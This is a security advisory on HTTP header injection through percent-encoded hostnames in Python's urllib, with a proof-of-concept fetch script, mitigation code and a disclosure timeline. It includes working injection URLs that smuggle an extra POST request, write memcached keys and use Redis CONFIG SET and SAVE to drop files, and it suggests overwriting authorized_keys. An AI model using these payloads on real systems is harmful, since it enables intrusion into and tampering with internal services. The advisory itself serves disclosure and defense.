Advisory: HTTP Header Injection in Python urllib

Python’s built-in URL library (“urllib2” in 2.x and “urllib” in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. “smuggling” attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.

The Bug

The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):

#!/usr/bin/env python3

import sys
import urllib
import urllib.error
import urllib.request

url = sys.argv[1]

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)

This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:

nc -l -p 12345

In a non-malicious example, we can hit that service by running:

./fetch3.py http://127.0.0.1:12345/foo

This caused the following request headers to appear in the netcat terminal:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Connection: close
Host: 127.0.0.1:12345

Now we repeat this exercise with a malicious hostname:

./fetch3.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

The observed HTTP request is:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
X-injected: header
x-leftover: :12345
Connection: close

Here the attacker can fully control a new injected HTTP header.
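
To make the decoding step concrete, here is a minimal sketch that percent-decodes the host component of the URL above. The helper name decoded_host is hypothetical, the splitting logic is a simplification (it ignores IPv6 literals), and the final Host line is formed by plain concatenation purely for illustration. It is not a copy of urllib's internals.

```python
from urllib.parse import unquote, urlsplit


def decoded_host(url):
    """Return the percent-decoded host of url, without the trailing port.

    Hypothetical helper for illustration only; IPv6 literals are not handled.
    """
    netloc = urlsplit(url).netloc
    # Drop any "user:pass@" prefix, then split off a trailing ":port" if present.
    hostport = netloc.rpartition("@")[2]
    host, sep, _port = hostport.rpartition(":")
    if not sep:
        host = hostport
    return unquote(host)


url = "http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo"
host = decoded_host(url)
print(repr(host))

# Assumption: the header value is the decoded host followed by ":port".
for line in f"Host: {host}:12345".split("\r\n"):
    print(line)
```

Under that assumption the loop prints three separate header lines, matching the Host, X-injected, and x-leftover lines in the request captured above.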

The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to look up the appropriate hostname:

http://localhost%0d%0ax-bar:%20:12345/foo

But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:

http://localhost%00%0d%0ax-bar:%20:12345/foo

Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.
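
Because redirects bypass any check made on the initial URL, an application that cannot upgrade right away might re-validate every redirect target as well. The following is a rough mitigation sketch, not the upstream fix. The names netloc_is_suspicious, StrictRedirectHandler and fetch_headers are hypothetical, and the rule used (reject any control character or space in the decoded authority) is an assumption about what counts as suspicious. It relies on the documented HTTPRedirectHandler.redirect_request hook.

```python
import urllib.error
import urllib.request
from urllib.parse import unquote, urlsplit


def netloc_is_suspicious(url):
    """True if the percent-decoded authority holds control characters or spaces."""
    decoded = unquote(urlsplit(url).netloc)
    return any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in decoded)


class StrictRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Redirect handler that refuses targets with a suspicious authority."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        if netloc_is_suspicious(newurl):
            raise urllib.error.URLError("refusing redirect to suspicious host")
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_headers(url):
    """Fetch url and return its response headers, checking every hop."""
    if netloc_is_suspicious(url):
        raise urllib.error.URLError("refusing suspicious host")
    # Passing a subclass instance replaces the default redirect handler.
    opener = urllib.request.build_opener(StrictRedirectHandler())
    with opener.open(url) as resp:
        return resp.info()
```

The check only covers the host portion discussed in this advisory. It is meant as defense in depth alongside a patched interpreter, not as a replacement for one.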

Attack Scenarios

Here we discuss just a few of the scenarios where exploitation of these flaws could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there is a vast variety of ways in which the flaws could be used, and we don’t pretend to be able to predict them all.

HTTP Header Injection and Request Smuggling

The attack scenarios related to injecting extra headers and requests into an HTTP stream have been well documented for some time. Unlike the early request smuggling research, which covers a complex variety of attacks, these simple injections would allow the addition of extra HTTP headers and request methods. While the addition of extra HTTP headers seems pretty limited in utility in this context, the ability to submit different HTTP methods and bodies is quite useful. For instance, if an ordinary HTTP request sent by urllib looks like this:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: close

Then an attacker could inject a whole extra HTTP request into the stream with URLs like:

http://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

Which produces:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: Keep-Alive

POST /bar HTTP/1.1
Host: 127.0.0.1
Content-Length: 31

{"new":"json","content":"here"}
:12345
Connection: close

This kind of full request injection was demonstrated to work against Apache HTTPD, though it may not work against web servers that do not support pipelining or are more restrictive on when it can be used. Obviously this kind of attack scenario could be very handy against internal, unauthenticated REST, SOAP, and similar services. (For example, see: Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2).)
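
The structure of that URL is easier to see when it is assembled from its decoded parts. The sketch below rebuilds it with urllib.parse.quote and derives Content-Length from the body instead of hard-coding it. The variable names are illustrative, and quote emits uppercase hex digits, so the result differs from the URL above only in the case of the escapes.

```python
import json
from urllib.parse import quote, unquote

# Body of the smuggled POST request, serialized without extra whitespace.
body = json.dumps({"new": "json", "content": "here"}, separators=(",", ":"))

# Everything that follows "127.0.0.1" in the host component, before encoding.
injected = (
    "\r\nConnection: Keep-Alive\r\n"   # keep the connection open after the GET
    "\r\n"                             # blank line ends the first request's headers
    "POST /bar HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    f"Content-Length: {len(body)}\r\n"
    "\r\n"
    f"{body}\r\n"
)

# safe="" forces ":" and "/" to be percent-encoded as well.
url = "http://127.0.0.1" + quote(injected, safe="") + ":12345/foo"
print(url)
print(unquote(url))
```

Decoding the printed URL gives back the same text as decoding the URL shown above, including the 31-byte body length.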

Attacking memcached

As described in the protocol documentation, memcached exposes a very simple network protocol for storing and retrieving cached values. Typically this service is deployed on application servers to speed up certain operations or share data between multiple instances without having to rely on slower database calls. Note that memcached is often not password protected because that is the default configuration. Developers and administrators often operate under the poorly conceived notion that “internal” services of these kinds can’t be attacked by outsiders.

In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:

http://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo

This generates the following HTTP request:

GET /foo HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
set foo 0 0 5
ABCDE
:11211

When these lines are evaluated against memcached's protocol syntax, most of them are syntax errors. However, memcached does not close the connection upon receiving bad commands, which allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR

The “foo” value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.
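
The reply sequence above can be reasoned about with a toy model of a line-oriented server. This is emphatically not memcached's parser: the function toy_memcached is hypothetical, it recognizes only the set command, and it assumes that every other line, including the blank line that terminates the HTTP headers, draws a single ERROR reply. That last assumption was chosen so the reply count lines up with the observed output.

```python
def toy_memcached(stream):
    """Toy model: one reply per line; 'set' also consumes the next line as data."""
    lines = stream.split(b"\r\n")
    # A stream ending in CRLF leaves one empty trailing element; drop it.
    if lines and lines[-1] == b"":
        lines.pop()
    replies = []
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        # set <key> <flags> <exptime> <bytes>, followed by a data line
        if len(parts) == 5 and parts[0] == b"set" and parts[4].isdigit():
            data = lines[i + 1] if i + 1 < len(lines) else b""
            ok = len(data) == int(parts[4])
            replies.append("STORED" if ok else "CLIENT_ERROR bad data chunk")
            i += 2
        else:
            replies.append("ERROR")
            i += 1
    return replies


request = (
    b"GET /foo HTTP/1.1\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Connection: close\r\n"
    b"User-Agent: Python-urllib/3.4\r\n"
    b"Host: 127.0.0.1\r\n"
    b"set foo 0 0 5\r\n"
    b"ABCDE\r\n"
    b":11211\r\n"
    b"\r\n"
)
print("\n".join(toy_memcached(request)))
```

The point of the model is that the one well-formed command is honored no matter how much unrecognized text surrounds it.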

Attacking Redis

Redis is very similar to memcached in several ways, though it also provides backup storage of data, several built-in data types, and the ability to execute Lua scripts. Quite a bit has been published about attacking Redis in the last few years. Since Redis provides a TCP protocol very similar to memcached, and it also allows one to submit many erroneous commands before correct ones, the same attacks work in terms of fiddling with an application’s stored data.

In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker-controlled data. For instance, this URL creates a new database file at /tmp/evil:

http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo

And we can see the contents include a key/value pair set during the attack:

# strings -n 3 /tmp/evil
REDIS0006
foo
bar

In theory, one could use this attack to gain remote code execution on Redis by (over-)writing various files owned by the service user, such as:
 ~redis/.profile
 ~redis/.ssh/authorized_keys
 ...

However, in practice many of these files may not be available, may not be used by the system, or may otherwise be impractical targets for attacks.

Versions Affected

All recent versions of Python in the 2.x and 3.x branches were affected. Cedric Buissart helpfully provided information on where the issue was fixed in each:

3.4 / 3.5 : revision 94952
2.7 : revision 94951

While the fix has been available for a while in the latest versions, the lack of follow-through by Python Security means many stable OS distributions likely have not had backported patches applied to address it. At least Debian Stable, as of this writing, is still vulnerable.

Responsible Disclosure Log

2016-01-15

Notified Python Security of vulnerability with full details.

2016-01-24

Requested status from Python Security, due to lack of human response.

2016-01-26

Python Security list moderator said original notice held up in moderation queue. Mails now flowing.

2016-02-07

Requested status from Python Security, since no response to vulnerability had been received.

2016-02-08

Response from Python Security. Stated that issue is related to a general header injection bug, which has been fixed in recent versions. Belief that part of the problem lies in glibc; working with RedHat security on that.

2016-02-08

Asked if Python Security had requested a CVE.

2016-02-12

Python Security stated no CVE had been requested, will request one when other issues sorted out. Provided more information on glibc interactions.

2016-02-12

Responded in agreement that one aspect of the issue could be glibc’s problem.

2016-03-15

Requested a status update from Python Security.

2016-03-25

Requested a status update from Python Security. Warned that typical disclosure policy has a 90 day limit.

2016-06-14

RedHat requested a CVE for the general header injection issue. Notified Python Security that full details of issue would be published due to inaction on their part.

2016-06-15

Full disclosure.

Source: https://blog.blindspotsecurity.com/